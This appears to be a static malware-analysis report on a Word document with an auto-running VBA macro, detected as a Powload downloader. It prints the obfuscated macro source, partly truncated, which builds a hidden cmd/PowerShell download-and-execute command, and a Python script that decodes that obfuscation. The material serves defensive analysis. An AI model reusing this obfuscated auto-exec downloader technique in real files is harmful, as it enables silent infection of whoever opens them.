Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 63ab5c6f99e1d08d…

MALICIOUS

Office (OLE)

Size: 100.2 KB
Created: 2018-07-30 13:16:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: d9ec73d9f0c9773fcd640ac6012637d1
SHA-1: f456290ca2539c0964c60a0d227d492085206160
SHA-256: 63ab5c6f99e1d08d5d1980845d1d141cca5bffd960e30c2c8f531ec59f3b5cc4
Risk Score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is a Word document carrying a VBA project whose AutoOpen procedure runs as soon as the document is opened with macros enabled. Almost every line of the project is padding: AppActivate calls on undeclared names that fail silently under On Error Resume Next. The payload is a single Shell call whose command string is built by concatenating string-literal fragments returned by helper functions (OziLPY, mriHqobA, zDkRUaCa and others). The fragments visible in the preview assemble to cmd /V:ON/C"set Ja=<78-character alphabet>&&for %8 in (<list of indices>) ..., the cmd.exe delayed-expansion trick in which each index selects one character of Ja to rebuild a hidden command. The do-clause of the loop falls outside the preview, but reading the visible indices against Ja yields a PowerShell stub that creates a Net.WebClient and holds an '@'-separated list of download URLs, so the second stage is a download-and-execute routine. The Shell window-style argument, 413851704 - 413851704, evaluates to 0 (vbHide), so no console window is shown to the user. The ClamAV detection Doc.Malware.Powload-6752222-0 (Powload is a detection name for macro downloaders of exactly this kind) agrees with that reading.

Heuristics (5)

  • ClamAV: Doc.Malware.Powload-6752222-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Powload-6752222-0
  • VBA macros detected [medium, 1 related finding] OLE_VBA_MACROS
    Document contains VBA macro code (extracted as macros.bas below).
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    The VBA project contains a Sub AutoOpen procedure, which Word runs automatically when the document is opened with macros enabled; it is the entry point of the downloader.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    Generic description of this rule: the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, which is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself. The rule's usual caveat that no modern VBA project was recovered does not apply to this sample: a VBA project was recovered (macros.bas below) and its Sub AutoOpen is the string the marker matches on, so this finding duplicates OLE_VBA_AUTOOPEN rather than adding a second execution surface.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
    This is the DrawingML XML namespace URI that Office writes into embedded drawing parts; it is benign and is not a download or C2 location. The download URLs the macro actually uses are not present as plain strings in the macro source (they are reassembled at run time from the index list), which is why the URL extractor cannot see them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  6071 bytes
SHA-256: f6abe5d4bb1256eb7f77555ddfa59216a2271ac35983a8397bcb08aaac98baa8
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KdYBNJXA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate iAFYW
   AppActivate 8876
   AppActivate Sgn(sLYZvd * lqEvmv)
   AppActivate CBool(2)
   AppActivate VjXUE
   AppActivate ChrB(44487 * Wootd)
Shell@ CVar("cm") + uRJRMKMY + hLRzTkimn + OziLPY + mriHqobA + zDkRUaCa + wAFnOSnsGjw + ViwzCivm + kKEJCLhZwaurF, 413851704 - 413851704
   AppActivate IttWX
   AppActivate Tan(28264 * YQEBd)
End Sub


Attribute VB_Name = "nkBODMJMldMEH"
Function OziLPY()
On Error Resume Next
AppActivate CSng(XpJzG)
   AppActivate lElBC
KdZPXiI = "d" + " /V:ON/" + "C" + CStr(Chr(PpwdRldPBrzfW + BCQUkww + 34 + YoWIciwjJUcdS + ZbaWOlaM)) + "set Ja=DI" + "mwqhwwOaMF" + "jvHMdjqz" + "AHhNTLn3k7" + ";$.b/@c" + "W:"
AppActivate sJSlZO
   AppActivate CStr(QckCi)
   AppActivate CStr(5289)
XiliKnvDES = "sf{Pte" + " x\4=28Jl" + "-pC'E" + "ruQ}yU)(6g" + "+0X,Sio9" + "R&" + "&for" + " %8 in " + "(55,75," + "7,44,59,3"
AppActivate 1051
   AppActivate CInt(uQZWVZ)
mmVjkqKIQow = "9,22" + ",44,53,5" + "3,45,31,77" + ",33,58,49," + "26,44" + ",7,54,75,3"
AppActivate Int(8523)
   AppActivate 45
SsDnIFzk = "3,17" + ",44,36,43" + ",45,23,44" + ",43,32,3" + "7,44,33,5"
AppActivate 563
   AppActivate CByte(jdFMG - JESlW)
AbcEU = "6,53," + "74," + "44,26," + "43" + "," + "30," + "31," + "40,73" + ",7" + "3" + ",49,57,22"
AppActivate iWLSaQ
   AppActivate CDbl(IMoQuM)
imdCC = ",43,43,5" + "5,3" + "8,34," + "3" + "4,4" + "0,55,4" + "4,9,36" + ",44,39,32,"
OziLPY = KdZPXiI + XiliKnvDES + mmVjkqKIQow + SsDnIFzk + AbcEU + imdCC
   AppActivate CDbl(353005535)
   AppActivate OHjwfq
End Function
Function mriHqobA()
On Error Resume Next
AppActivate 41
   AppActivate 325
   AppActivate 401087306
iADzB = "26" + ",44,43,3" + "4,23," + "68,11,37,6" + "7,2" + "5,35" + ",2" + "2,43,43," + "55,38,3" + "4"
AppActivate hCWsa
   AppActivate FpItJ
   AppActivate CDate(rjnCPi)
jOhEvRpB = ",34,17," + "46,33,9,75" + ",2" + "2,60,39,9," + "26,3"
AppActivate 283753694
   AppActivate CSng(bcWMB + jlFbOF * RXGFmh / KGEAh)
pBPVNOdtZc = "2," + "36,75,2" + ",34,51,77" + ",61,71,7" + "3,35,22," + "43,43,55,3" + "8," + "34" + ",34,7"
AppActivate YJzlh
   AppActivate CStr(233568307)
tTsGzkkbvYo = ",7,7,32," + "2,44," + "68,9,27,67" + ",70,32," + "28,74" + ",44," + "26,26,22" + ",9,63,32" + ",13" + ",26,34,7," + "55,54," + "36" + ",75,26,43,"
AppActivate Oct(27)
   AppActivate Hex(EsVlm)
   AppActivate Fix(NRQwKs)
LYwaYWoUA = "44,2" + "6,4" + "3,34,60,5" + "5,53,75,9," + "16,39," + "34,39," + "50,64" + ",11,52" + ","
AppActivate YViiT
   AppActivate CBool(65)
   AppActivate 224
jYJhBjwiLc = "35,22,43" + ",43,55,3" + "8,34,34,2," + "74," + "36,59" + ",75," + "26,44,43"
AppActivate IskGT
   AppActivate CInt(6)
qENuc = ",54,39,75" + "," + "5" + "3,60,4" + "3,74,75,26" + ",3" + "9,32,36," + "75,2" + ",34,2"
mriHqobA = iADzB + jOhEvRpB + pBPVNOdtZc + tTsGzkkbvYo + LYwaYWoUA + jYJhBjwiLc + qENuc
   AppActivate 123212862
   AppActivate iYTFZs
End Function
Function zDkRUaCa()
On Error Resume Next
AppActivate frurL
   AppActivate 157
   AppActivate Tan(YZZhZ + 92113)
dcHBMSN = "5,6" + "4,7" + "6,1" + "5,29,48,18" + ",35,22,4" + "3,4"
AppActivate hJdIK
   AppActivate CStr(9)
   AppActivate CLng(VBSwm)
bSjzPWiS = "3,55," + "38" + ",3" + "4,3" + "4,33,9" + ",60,43,44," + "32,75,59" + ",68," + "34,71,"
AppActivate Rnd(OBcIQ)
   AppActivate Int(klXON)
ohmzHoGz = "57,32,73" + ",55,53,74," + "43,66,57" + ",35,57,6" + "5," + "30,31,17" + ",6" + "0,33,45,4" + "9,45,"
AppActivate wVOZWK
   AppActivate Round(JDLoX)
nIvHvprv = "57,67,51,7" + "6,57" + ",30,31,55" + ",15,2" + "8,49,31" + ","
AppActivate CInt(50895 - rslpBz)
   AppActivate 140
   AppActivate Sqr(KVpKZ - 15777 / UIubj / MTWdJ)
XcRhULf = "44," + "26,13," + "38,43" + ",44,2" + ",55," + "69,5" + "7," + 
... (truncated)
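Reconstructing the command from the preview above, as an added example that is not code from the sample or from the analysis tool behind this report: the script re-evaluates the VBA string concatenation the way VBA does under On Error Resume Next (undeclared names are Empty, so they add nothing to a string and count as 0 in arithmetic), then undoes the cmd.exe index trick. The VBA source embedded in it is transcribed from the preview (the Shell line of AutoOpen and the two helper functions that are complete there); the do-clause of the for loop is not in the preview, and the decoder assumes the usual set X=!X!!Ja:~%8,1! substring pick, an assumption that the readable PowerShell it produces supports.

```python
import re

# Added example for this report, not code from the sample or from an analysis tool.
# VBA_SRC is transcribed from the preview above (AutoOpen's Shell line and the two
# complete helper functions, AppActivate noise dropped except one line); helper
# functions the preview cuts off are absent here and therefore resolve to "".
VBA_SRC = r'''
Sub AutoOpen()
   AppActivate iAFYW
Shell@ CVar("cm") + uRJRMKMY + hLRzTkimn + OziLPY + mriHqobA + zDkRUaCa + wAFnOSnsGjw + ViwzCivm + kKEJCLhZwaurF, 413851704 - 413851704
End Sub
Function OziLPY()
KdZPXiI = "d" + " /V:ON/" + "C" + CStr(Chr(PpwdRldPBrzfW + BCQUkww + 34 + YoWIciwjJUcdS + ZbaWOlaM)) + "set Ja=DI" + "mwqhwwOaMF" + "jvHMdjqz" + "AHhNTLn3k7" + ";$.b/@c" + "W:"
XiliKnvDES = "sf{Pte" + " x\4=28Jl" + "-pC'E" + "ruQ}yU)(6g" + "+0X,Sio9" + "R&" + "&for" + " %8 in " + "(55,75," + "7,44,59,3"
mmVjkqKIQow = "9,22" + ",44,53,5" + "3,45,31,77" + ",33,58,49," + "26,44" + ",7,54,75,3"
SsDnIFzk = "3,17" + ",44,36,43" + ",45,23,44" + ",43,32,3" + "7,44,33,5"
AbcEU = "6,53," + "74," + "44,26," + "43" + "," + "30," + "31," + "40,73" + ",7" + "3" + ",49,57,22"
imdCC = ",43,43,5" + "5,3" + "8,34," + "3" + "4,4" + "0,55,4" + "4,9,36" + ",44,39,32,"
OziLPY = KdZPXiI + XiliKnvDES + mmVjkqKIQow + SsDnIFzk + AbcEU + imdCC
End Function
Function mriHqobA()
iADzB = "26" + ",44,43,3" + "4,23," + "68,11,37,6" + "7,2" + "5,35" + ",2" + "2,43,43," + "55,38,3" + "4"
jOhEvRpB = ",34,17," + "46,33,9,75" + ",2" + "2,60,39,9," + "26,3"
pBPVNOdtZc = "2," + "36,75,2" + ",34,51,77" + ",61,71,7" + "3,35,22," + "43,43,55,3" + "8," + "34" + ",34,7"
tTsGzkkbvYo = ",7,7,32," + "2,44," + "68,9,27,67" + ",70,32," + "28,74" + ",44," + "26,26,22" + ",9,63,32" + ",13" + ",26,34,7," + "55,54," + "36" + ",75,26,43,"
LYwaYWoUA = "44,2" + "6,4" + "3,34,60,5" + "5,53,75,9," + "16,39," + "34,39," + "50,64" + ",11,52" + ","
jYJhBjwiLc = "35,22,43" + ",43,55,3" + "8,34,34,2," + "74," + "36,59" + ",75," + "26,44,43"
qENuc = ",54,39,75" + "," + "5" + "3,60,4" + "3,74,75,26" + ",3" + "9,32,36," + "75,2" + ",34,2"
mriHqobA = iADzB + jOhEvRpB + pBPVNOdtZc + tTsGzkkbvYo + LYwaYWoUA + jYJhBjwiLc + qENuc
End Function
'''

def split_top(expr, sep):
    """Split on sep outside parentheses and outside "..." literals."""
    parts, buf, depth, quoted = [], '', 0, False
    for ch in expr:
        if ch == '"':
            quoted = not quoted
        elif not quoted and ch in '()':
            depth += 1 if ch == '(' else -1
        elif not quoted and ch == sep and depth == 0:
            parts.append(buf.strip())
            buf = ''
            continue
        buf += ch
    return parts + [buf.strip()]

def arith(expr):
    """+/- arithmetic; undeclared names are Empty (0), so Chr(a + 34 + b) is Chr(34)."""
    total, sign = 0, 1
    for tok in re.findall(r'[+-]|\d+|[A-Za-z_]\w*', expr):
        sign = {'+': 1, '-': -1}.get(tok, sign)
        total += sign * int(tok) if tok.isdigit() else 0
    return total

def eval_str(expr, env, unresolved):
    """Concatenate a VBA string expression: literals as-is, Chr() evaluated, other
    conversions (CStr, CVar) pass their argument through, unknown names are Empty."""
    out = []
    for term in split_top(expr, '+'):
        call = re.match(r'^([A-Za-z_]\w*)\((.*)\)$', term, re.S)
        if term.startswith('"'):
            out.append(term[1:-1])
        elif call and call.group(1) == 'Chr':
            out.append(chr(arith(call.group(2))))
        elif call:
            out.append(eval_str(call.group(2), env, unresolved))
        elif term in env:
            out.append(env[term])
        else:
            unresolved.append(term)  # contributes "" under On Error Resume Next
    return ''.join(out)

def reconstruct_shell(src):
    """Return (Shell command, window style, names the preview cannot resolve)."""
    funcs, local, unresolved, shell = {}, {}, [], None
    for line in src.splitlines():
        proc = re.match(r'^\s*(?:Function|Sub)\s+([A-Za-z_]\w*)\s*\(\)', line)
        assign = re.match(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+)$', line)
        if proc:
            cur, local = proc.group(1), {}
        elif re.match(r'^\s*End (?:Function|Sub)\b', line):
            funcs[cur] = local.get(cur, '')  # a Function's return value
        elif line.lstrip().startswith('Shell'):
            shell = line.lstrip().split(None, 1)[1]  # drop the Shell@ keyword
        elif assign:  # AppActivate noise has no '=' and is skipped here
            local[assign.group(1)] = eval_str(assign.group(2), {**funcs, **local}, unresolved)
    cmd_expr, style_expr = split_top(shell, ',')
    return eval_str(cmd_expr, funcs, unresolved), arith(style_expr), unresolved

def decode_index_trick(cmd):
    """Undo  set V=<alphabet>&&for %i in (n,...) do set X=!X!!V:~%i,1!  by picking
    alphabet[n] for every index n (the do-clause is beyond the preview: assumed)."""
    m = re.search(r'set \w+=(.*?)&&for %\w in \(([\d,\s]*)', cmd, re.S)
    indices = [int(n) for n in m.group(2).split(',') if n.strip()]
    return m.group(1), ''.join(m.group(1)[n] for n in indices)

if __name__ == '__main__':
    cmd, style, missing = reconstruct_shell(VBA_SRC)
    print(style, missing, decode_index_trick(cmd)[1], sep='\n')
```

Running it reports window style 0 (vbHide), lists the six names the preview cannot resolve (uRJRMKMY, hLRzTkimn, zDkRUaCa, wAFnOSnsGjw, ViwzCivm, kKEJCLhZwaurF), and prints a second stage that begins powershell $RbE=new-object Net.WebClient;$fSS='http:// followed by three '@'-separated download URLs. The rest of the PowerShell sits in the truncated functions, so the script leaves a hole there rather than guessing; run it on the full macros.bas to recover the complete command and the download URLs as indicators.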